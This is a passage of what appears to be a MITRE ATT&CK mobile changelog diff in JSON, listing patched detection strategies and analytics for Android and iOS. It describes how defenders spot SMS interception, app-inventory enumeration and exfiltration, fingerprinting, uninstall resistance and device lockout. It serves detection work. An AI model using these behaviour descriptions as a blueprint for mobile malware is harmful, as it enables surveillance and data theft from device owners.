+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--69f0f372-4bb1-4c0e-b81a-d425b2f6f31f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0672",
+                            "external_id": "DET0672"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Web Service",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ab85ff40-2b75-477a-b5ec-f35f2fcde728",
+                        "x-mitre-analytic--a0bb0e33-c40f-46f5-b64a-07faa6946d83"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f06f44c7-97ff-4f8d-8c72-650c98e0ebdc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0709",
+                            "external_id": "DET0709"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Wi-Fi Discovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a3b1f9ea-184b-4429-94c0-d04c3b457b91",
+                        "x-mitre-analytic--ea9bb66e-1ced-4448-8d64-4184ae1c0ac9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "analytics": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--23a1b062-847e-4912-8e5e-5b69867af4a4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0598#AN1644",
+                            "external_id": "AN1644"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1644",
+                    "description": "Correlates (1) an application obtaining or maintaining elevated control mechanisms capable of resisting removal (device administrator, accessibility control, managed-owner posture), (2) user navigation into uninstall or application-management flows, and (3) immediate UI redirection, back-navigation injection, modal dismissal, or failed uninstall completion followed by continued app presence. Defender observes a causal chain where a removal attempt is actively disrupted and the target application remains installed.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application enabled as device administrator, device owner, profile owner, or equivalent elevated management role before uninstall attempt"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application granted accessibility service privileges capable of screen observation or global action invocation before removal attempt"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between uninstall UI entry, interference event, and continued install state"
+                        },
+                        {
+                            "field": "ProtectedRoleSet",
+                            "description": "Set of elevated roles considered removal-resistant (device admin, owner modes, accessibility)"
+                        },
+                        {
+                            "field": "GlobalActionSet",
+                            "description": "UI actions considered suspicious during uninstall flows (BACK, HOME, RECENTS)"
+                        },
+                        {
+                            "field": "AllowedAccessibilityApps",
+                            "description": "Known legitimate accessibility services expected to use global actions"
+                        },
+                        {
+                            "field": "UninstallRetryThreshold",
+                            "description": "Number of repeated uninstall attempts before escalation"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold confirming continued meaningful activity after failed removal"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 20:30:18.846000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a69604d3-2909-46bf-afd3-39b47ac5e5fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0599#AN1645",
+                            "external_id": "AN1645"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1645",
+                    "description": "The defender correlates SMS-relevant permission state or default SMS handler role with subsequent unauthorized SMS send, receive interception, message database modification, deletion, or concealment behavior by an application outside expected messaging workflows. The analytic prioritizes Android-observable control-plane effects: SEND_SMS or RECEIVE_SMS capability, default SMS handler change or exercise of SMS_DELIVER semantics, direct interaction with the SMS content provider or messaging database, and SMS activity occurring from background or locked-device state without recent user interaction.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app granted SEND_SMS or RECEIVE_SMS permission, or app role/policy indicates SMS-capable behavior inconsistent with approved enterprise function before SMS control activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Default SMS handler changes to non-baselined application or managed app unexpectedly becomes or remains device default SMS app during SMS control phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between permission or role change, SMS control activity, message-store modification, and any follow-on network communication"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to send or manage SMS, such as default messaging apps, carrier tools, device migration apps, or approved enterprise communications apps"
+                        },
+                        {
+                            "field": "AllowedDefaultSMSHandlers",
+                            "description": "Approved packages allowed to become the default SMS handler on managed devices"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved network destinations associated with legitimate messaging synchronization or carrier workflows"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether SMS send or message modification should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "MessageModificationThreshold",
+                            "description": "Number of insert, update, or delete operations against SMS store within a short interval required before alerting"
+                        },
+                        {
+                            "field": "SMSSendRateThreshold",
+                            "description": "Maximum expected SMS send frequency for legitimate app behavior"
+                        },
+                        {
+                            "field": "HighRiskNumberPatterns",
+                            "description": "Environment-specific list of premium-rate, adversary-known, or non-business SMS destination patterns"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-09 16:57:33.679000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--992c6fa4-689c-4ce1-883f-f48a8b1c5ccc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0600#AN1646",
+                            "external_id": "AN1646"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1646",
+                    "description": "Defender correlates an app enumerating installed packages (PackageManager queries or shell 'pm list packages') with selective checks for high-value targets (banking/identity/security apps) and near-term persistence/egress of the inventory. Chain: capability to query apps \u2192 burst of enumeration calls or shell listing \u2192 optional foreground target detection \u2192 local inventory file \u2192 small POST to remote endpoint.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "android:logcat",
+                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from enumeration to persist/exfil (e.g., 10\u2013120s)."
+                        },
+                        {
+                            "field": "MinEnumCount",
+                            "description": "Minimum count of package queries or listed rows to treat as inventory (e.g., \u226550)."
+                        },
+                        {
+                            "field": "TargetAppWatchlist",
+                            "description": "List of sensitive app package prefixes (banking/IdP/AV/MDM) to raise severity."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for inventory artifacts in the app container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known-good analytics/CDN endpoints to suppress FPs."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Work Profile/Kiosk/Jamf/Intune policy context to scope benign inventory jobs."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-01-29 20:03:14.269000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--bff6f104-006e-48e5-ac3f-4633bb3abac5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0600#AN1647",
+                            "external_id": "AN1647"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1647",
+                    "description": "Defender correlates attempts to inventory installed apps via LaunchServices/URL-scheme probing or private APIs (e.g., LSApplicationWorkspace) with checks for high-value targets and quick persistence/egress. Chain: capability/attempt (URL scheme spray or LSWorkspace calls) \u2192 large scheme/app probe set \u2192 optional webview hits to brand domains \u2192 local inventory cache \u2192 small egress.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from probe burst to persist/exfil (e.g., 10\u2013120s)."
+                        },
+                        {
+                            "field": "MinProbeCount",
+                            "description": "Minimum count of scheme/app probes to treat as inventory (e.g., \u226540)."
+                        },
+                        {
+                            "field": "TargetBundleWatchlist",
+                            "description": "Bundle IDs/schemes of sensitive targets (banking/IdP/AV/MDM)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for inventory artifacts in container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Allowlist of enterprise analytics/CDN to reduce FPs."
+                        },
+                        {
+                            "field": "JailbreakContext",
+                            "description": "Flag to escalate if private APIs appear on non-managed devices."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-01-29 20:27:08.190000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--55699534-c11f-4f9b-8908-a0c7d59160fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0601#AN1648",
+                            "external_id": "AN1648"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1648",
+                    "description": "Defender correlates an app process performing a burst of OS/device attribute lookups (build, hardware, SDK level, system properties) with near-term execution branching (feature gating, module load, permission workflow changes) and/or immediate outbound communications, indicating environment evaluation used to shape follow-on actions.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window for system-info collection burst \u2192 outbound transmission (e.g., 60\u2013900s)."
+                        },
+                        {
+                            "field": "MinSystemInfoSignals",
+                            "description": "Minimum number of distinct system-attribute reads/queries within window to count as \u2018broad fingerprinting\u2019 (tune to telemetry fidelity)."
+                        },
+                        {
+                            "field": "DistinctAttributeThreshold",
+                            "description": "How many distinct attribute categories (build fields, cpu, locale, patch level, network identifiers) must be observed."
+                        },
+                        {
+                            "field": "BackgroundOnly",
+                            "description": "If true, require the burst occurs while app is background to reduce noise from legitimate settings/about-device screens."
+                        },
+                        {
+                            "field": "AllowlistedPackages",
+                            "description": "Legitimate device management, diagnostics, carrier services, and enterprise security apps expected to collect device inventory."
+                        },
+                        {
+                            "field": "NewDomainWindowSeconds",
+                            "description": "Window for \u2018newly contacted domain\u2019 enrichment after fingerprinting burst."
+                        },
+                        {
+                            "field": "SmallPostByteRange",
+                            "description": "Approximate payload size range used for \u2018fingerprint submit\u2019 heuristic (environment dependent)."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-02-23 17:40:11.076000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--04e54116-5787-4bb0-9c4a-2b620a80b5dc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0601#AN1649",
+                            "external_id": "AN1649"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1649",
+                    "description": "Defender correlates an app querying device model and iOS version (often limited to UIDevice-visible attributes) with subsequent behavior divergence (capability gating, alternate code paths) and/or near-term outbound connections, suggesting device fingerprinting for decision-making rather than normal telemetry.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application invokes UIDevice queries (model, systemVersion, name)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "QueryFrequencyThreshold",
+                            "description": "Baseline-dependent threshold for distinguishing normal app telemetry from discovery behavior"
+                        },
+                        {
+                            "field": "QueryToExecutionDeviationWindow",
+                            "description": "Defines acceptable delay between device queries and execution changes"
+                        },
+                        {
+                            "field": "DeviceModelBaseline",
+                            "description": "Allows tuning for environments with homogeneous vs heterogeneous device fleets"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-02-23 17:42:33.331000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9ed67778-6277-4e12-aa3e-29f39a81e67a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0602#AN1650",
+                            "external_id": "AN1650"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1650",
+                    "description": "OLD: Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application\u2019s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. \nOn Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.\n\nNEW: A defender observes an Android application requesting for `android.permission.READ_CALL_LOG`, which may also be listed in the application's manifest file. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Invocation of CallLogs.getLastOutgoingCall()"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining the READ_CALL_LOG permission. "
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-23 17:35:57.553000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a5c4230b-7064-4863-9a60-e0565042d452",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0603#AN1652",
+                            "external_id": "AN1652"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1652",
+                    "description": "Correlates (1) acquisition or presence of elevated control paths capable of forcing a lock state or blocking user interaction, (2) invocation of screen-locking or UI-denial behavior such as DevicePolicyManager lock operations, persistent overlays, accessibility-driven navigation interruption, or foreground lock-screen impersonation, and (3) immediate transition of the device into an unavailable or repeatedly re-locked state while the responsible application remains installed and active. The defender observes a causal chain where an application first gains the ability to control lock-related behavior, then forces or simulates lockout, and the device becomes unusable to the legitimate user.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application enabled as device administrator, device owner, or profile owner before screen-lock or password-control activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application granted accessibility service privileges capable of intercepting UI flow or sustaining user-interaction denial before lockout event"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between privileged control acquisition, lockout action, and resulting device lock state"
+                        },
+                        {
+                            "field": "ProtectedRoleSet",
+                            "description": "Set of elevated roles that materially increase lockout capability, such as device admin, device owner, profile owner, or accessibility service"
+                        },
+                        {
+                            "field": "LockActionSet",
+                            "description": "Framework actions treated as lockout-relevant, including lockNow, password-control changes, overlay persistence, and UI-denial actions"
+                        },
+                        {
+                            "field": "AllowedAdminApps",
+                            "description": "Baseline of legitimate enterprise or security apps expected to invoke lock-related controls"
+                        },
+                        {
+                            "field": "RelockThreshold",
+                            "description": "Number of repeated lock or lock-like transitions in a short interval required before escalation"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold confirming continued meaningful activity after lockout"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-04-24 20:30:31.921000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9e2b0e14-eabd-4eb7-93b0-da238e3786db",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0604#AN1653",
+                            "external_id": "AN1653"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1653",
+                    "description": "The defender observes a newly enrolled or recently activated device presenting abnormal integrity, hardware-backed attestation, or firmware/build relationships at the management plane, followed by privileged or system-context access to protected resources or framework paths, and then outbound communication inconsistent with setup state, lock state, or recent user interaction. The causal sequence is strongest when the device has not yet reached a normal trusted posture but still exhibits system-level capability use or network activity.",
